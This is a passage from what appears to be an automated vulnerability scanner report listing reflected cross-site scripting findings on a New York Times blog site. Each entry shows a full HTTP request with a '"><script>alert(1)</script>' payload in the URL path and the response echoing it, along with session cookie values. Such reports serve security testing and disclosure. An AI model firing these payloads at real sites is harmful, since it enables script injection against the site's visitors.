Date: Sat, 13 Nov 2010 02:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/living-rooms/feedb4427\"><script>alert(1)</script>ffaa5e8cd26&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.210. http://opinionator.blogs.nytimes.com/category/living-rooms/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/living-rooms/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e15ad"><script>alert(1)</script>84073c0dd72 was submitted in the REST URL parameter 3. This input was echoed as e15ad\"><script>alert(1)</script>84073c0dd72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/living-rooms/pagee15ad"><script>alert(1)</script>84073c0dd72/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/living-rooms/pagee15ad\"><script>alert(1)</script>84073c0dd72/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.211. http://opinionator.blogs.nytimes.com/category/peter-orszag [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/peter-orszag

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56ee1"><script>alert(1)</script>2199c3904e8 was submitted in the REST URL parameter 2. This input was echoed as 56ee1\"><script>alert(1)</script>2199c3904e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/peter-orszag56ee1"><script>alert(1)</script>2199c3904e8 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:21:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:21:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/peter-orszag56ee1\"><script>alert(1)</script>2199c3904e8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.212. http://opinionator.blogs.nytimes.com/category/peter-orszag/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/peter-orszag/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22a78"><script>alert(1)</script>81dab4b1f01 was submitted in the REST URL parameter 2. This input was echoed as 22a78\"><script>alert(1)</script>81dab4b1f01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/peter-orszag22a78"><script>alert(1)</script>81dab4b1f01/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:21:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:21:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/peter-orszag22a78\"><script>alert(1)</script>81dab4b1f01&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.213. http://opinionator.blogs.nytimes.com/category/peter-orszag/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/peter-orszag/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983c8"><script>alert(1)</script>73ff25ea2e6 was submitted in the REST URL parameter 3. This input was echoed as 983c8\"><script>alert(1)</script>73ff25ea2e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/peter-orszag/feed983c8"><script>alert(1)</script>73ff25ea2e6/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:19:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:19:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/peter-orszag/feed983c8\"><script>alert(1)</script>73ff25ea2e6&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.214. http://opinionator.blogs.nytimes.com/category/peter-orszag/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/peter-orszag/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff106"><script>alert(1)</script>8da1306f600 was submitted in the REST URL parameter 3. This input was echoed as ff106\"><script>alert(1)</script>8da1306f600 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/peter-orszag/pageff106"><script>alert(1)</script>8da1306f600/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:20:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:20:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/peter-orszag/pageff106\"><script>alert(1)</script>8da1306f600/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.215. http://opinionator.blogs.nytimes.com/category/robert-wright [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/robert-wright

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14761"><script>alert(1)</script>4a380400f55 was submitted in the REST URL parameter 2. This input was echoed as 14761\"><script>alert(1)</script>4a380400f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/robert-wright14761"><script>alert(1)</script>4a380400f55 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:23:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:23:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/robert-wright14761\"><script>alert(1)</script>4a380400f55&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.216. http://opinionator.blogs.nytimes.com/category/robert-wright/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/robert-wright/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a281"><script>alert(1)</script>62e164a0066 was submitted in the REST URL parameter 2. This input was echoed as 5a281\"><script>alert(1)</script>62e164a0066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/robert-wright5a281"><script>alert(1)</script>62e164a0066/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:23:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:23:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/robert-wright5a281\"><script>alert(1)</script>62e164a0066&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.217. http://opinionator.blogs.nytimes.com/category/robert-wright/feed/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/robert-wright/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdcc7"><script>alert(1)</script>af7fb25909c was submitted in the REST URL parameter 3. This input was echoed as cdcc7\"><script>alert(1)</script>af7fb25909c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/robert-wright/feedcdcc7"><script>alert(1)</script>af7fb25909c/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:20:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/robert-wright/feedcdcc7\"><script>alert(1)</script>af7fb25909c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.218. http://opinionator.blogs.nytimes.com/category/robert-wright/page/2/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/robert-wright/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4caac"><script>alert(1)</script>2183f3ae5d2 was submitted in the REST URL parameter 3. This input was echoed as 4caac\"><script>alert(1)</script>2183f3ae5d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/robert-wright/page4caac"><script>alert(1)</script>2183f3ae5d2/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:24:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:24:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/robert-wright/page4caac\"><script>alert(1)</script>2183f3ae5d2/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.219. http://opinionator.blogs.nytimes.com/category/stanley-fish [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://opinionator.blogs.nytimes.com
Path:	/category/stanley-fish

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b14fb"><script>alert(1)</script>a43a7c90828 was submitted in the REST URL parameter 2. This input was echoed as b14fb\"><script>alert(1)</script>a43a7c90828 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/stanley-fishb14fb"><script>alert(1)</script>a43a7c90828 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
